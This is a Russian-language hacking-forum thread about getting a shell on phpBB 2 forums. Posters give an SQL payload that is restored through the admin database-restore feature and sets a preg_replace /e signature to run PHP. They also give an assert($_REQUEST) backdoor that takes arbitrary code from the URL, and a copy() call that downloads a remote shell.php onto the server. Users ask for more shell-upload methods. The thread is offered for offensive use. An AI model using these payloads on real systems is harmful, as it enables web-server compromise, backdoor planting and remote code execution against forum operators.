HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу phpbb shell
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.02.2012, 17:27
lansia
Участник форума
Регистрация: 06.02.2011
Сообщений: 111
С нами: 8033366

Репутация: 5
По умолчанию
Цитата:
Сообщение от None  
После того как "залатали" багу (3), обнаружилось, что залатали, вывод в профайл, а сама бага живая. (Нужны админские права).
Video: http://video.antichat.ru/file178.html
Эта бага присутсвует, почти на всех форумах, ее редко где залатали.
Как юзать:
Создаем текстовый файл 1.sql суем в него код
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb
hpinfo()' WHERE user_id=2;
ну вместо 2 ставим свой id
Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца
заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.
И какие команды есть для заливик шелла?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 07.02.2012, 17:41
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию
Вместо phpinfo() свой код ставь, например:

assert(stripslashes($_REQUEST[cod]));

После этого зайди в свой профиль, добавь к концу url:

&cod=PHP_CODE

PHP_CODE:

copy(что,куда);

Например.
 
Ответить с цитированием

  #3  
Старый 07.02.2012, 17:50
lansia
Участник форума
Регистрация: 06.02.2011
Сообщений: 111
С нами: 8033366

Репутация: 5
По умолчанию
А еще есть способы заливик шелла в phpBB 2.0.23
 
Ответить с цитированием

  #4  
Старый 17.02.2012, 21:10
Za[D]rot
Новичок
Регистрация: 26.10.2011
Сообщений: 10
С нами: 7656086

Репутация: 0
По умолчанию
Цитата:
Сообщение от lansia  
А еще есть способы заливик шелла в phpBB 2.0.23
+1 Также интересует
 
Ответить с цитированием

  #5  
Старый 22.02.2012, 16:31
flinster
Познающий
Регистрация: 29.01.2011
Сообщений: 52
С нами: 8044886

Репутация: 0
По умолчанию
тоже самое интересует

Цитата:
Сообщение от None  
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb
hpinfo()' WHERE user_id=2;
так работает, safe_mode off

пробовал залить так

profile.php?mode=editprofile&c=copy('http://откуда','/куда/shell.php');

но не получается, при переходе страница отсутствует (на других форумах получалось, а вот с одним мучаюсь да бестолку)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.